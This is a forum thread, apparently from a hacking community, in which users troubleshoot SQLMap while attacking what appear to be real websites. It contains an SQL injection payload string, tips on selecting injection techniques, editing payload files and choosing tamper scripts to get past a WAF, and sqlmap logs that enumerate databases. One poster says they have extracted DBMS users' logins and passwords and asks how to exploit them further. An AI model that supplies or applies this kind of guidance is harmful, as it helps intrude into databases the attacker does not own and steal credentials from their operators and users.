Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Is it really impossible to specify the SQL injection type and a specific payload through the options?
     
  2. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    You can't pick the payload yourself, but your log showed an error-based vector, so you can specify the injection type by adding --technique=E
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    The type, yes. The payload, I think, also.
     
  4. korneev

    korneev New Member

    Joined:
    24 Aug 2016
    Messages:
    13
    Likes Received:
    3
    Reputations:
    2
    I had a task like that once. I marked the injection point with * (something like ?id=334'+OR+'24'='24'+*+--+), and to choose the payload I had to edit the XML where those payloads are defined.
     
  5. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Thanks, I got the DBMS users' logins and passwords; how do I use them together with sqlmap, what do I do next))
     
  6. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    [10:21:10] [INFO] fetching tables for database: pinc
    [10:21:10] [INFO] the SQL query used returns 291 entries
    [10:21:10] [INFO] starting 10 threads
    [10:21:11] [INFO] heuristics detected web page charset 'ascii'
    Database: pincY3mc7_aqwert
    [1 table]
    +-----------+
    | UpText |
    +-----------+

    [10:21:37] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 291 times, 500 (Internal Server Error) - 1 times

    I can't get all the tables.
     
  7. andrei369

    andrei369 New Member

    Joined:
    19 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    [15:22:19] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-master\txt\user-agents.txt': 'Opera/7.23 (Windows 98; U) [en]'
    [15:22:19] [INFO] testing connection to the target URL
    [15:22:19] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
    [15:22:19] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
    [15:22:19] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [15:22:22] [CRITICAL] WAF/IDS/IPS identified as 'Generic (Unknown)'. Please consider usage of tamper scripts (option '--tamper')
    are you sure that you want to continue with further target testing? [y/N]

    Please advise how to get past the Generic WAF?
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    figure out what a generic WAF is and what it filters
     
  9. andrei369

    andrei369 New Member

    Joined:
    19 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    I don't know, that's why I'm asking!
    Which --tamper should I use?
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    I don't know which tamper to use either, no idea what WAF that is, maybe there's no tamper for it at all
    you need to work out how this WAF operates, and only then think about which tampers to use
    I'm drinking instant coffee, there are no grounds to read, no idea what this "generic" is
     
  11. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    [IMG]

    how do I deal with this?
     
  12. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    I didn't expect a more "helpful" answer.
     
  13. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    I wouldn't mind, if you had a proper answer instead of yet more post-count padding
     
  14. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    web application technology: Nginx
    back-end DBMS: MySQL >= 5.5
    banner: '5.5.44-0+deb7u1'
    [20:47:43] [INFO] fetching database names
    [20:47:43] [WARNING] the SQL query provided does not return any output
    [20:47:43] [INFO] fetching number of databases
    [20:47:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    [20:47:44] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

    [20:47:44] [ERROR] unable to retrieve the number of databases
    [20:47:44] [INFO] falling back to current database
    [20:47:44] [INFO] fetching current database
    [20:47:44] [INFO] resumed: martin
    available databases [1]:
    [*] martin

    [20:47:44] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times

    I can't get the tables.
     
  15. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    send me the target in a PM.
     
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    "available databases" says there is no access to information_schema, so no wonder there is no list of databases/tables)
    brute force imho, sqlmap can even do that, I think

    ----------------------
    although I don't rule out that there may be some WAF
    -v 3 to the rescue
     
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    and isn't there a tamper for information_schema?
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    by hand, it has to be done by hand.
     
  19. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    How to solve

    [CRITICAL] can't establish SSL connection

    whatever I found on Google, it doesn't get solved))
     
  20. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    how to solve this?)

    [CRITICAL] unable to connect to the target URL ('Connection reset by peer'). sqlmap is going to retry the request(s)